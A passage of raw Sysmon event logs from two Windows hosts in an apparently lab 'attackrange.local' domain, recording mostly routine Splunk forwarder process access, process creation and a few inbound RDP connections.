2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8D90-6151-197A-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D90-6151-197A-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.934{69CF5F33-8D90-6151-197A-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F65B8ACBD50D512C593E9326E6F3F2D2,SHA256=E840AA04EF035775F6DB1BEBD31519DEE4D1EC6CDE0815FDDF261AE0B1352F82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D90-6151-187A-00000000FD01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.262{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.246{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.246{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8D90-6151-187A-00000000FD01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.246{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D90-6151-187A-00000000FD01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.247{69CF5F33-8D90-6151-187A-00000000FD01}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000981215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:25.125{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de56874-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001056624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:26.347{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63751-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:26.151{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000981214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.996{69CF5F33-8D8F-6151-177A-00000000FD01}36603380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.919{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D91-6151-B000-00000000FD01}4612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D91-6151-B000-00000000FD01}4612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D91-6151-B000-00000000FD01}4612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.872{5EBD8912-8D91-6151-B000-00000000FD01}4612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:29.794{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF1477BC9018729BFFD1CCC5B195780,SHA256=EDE250C2152B6DFA93EA651DC87B508CCF2E45604D60F0E5B799E66F3F10188E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:29.465{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program 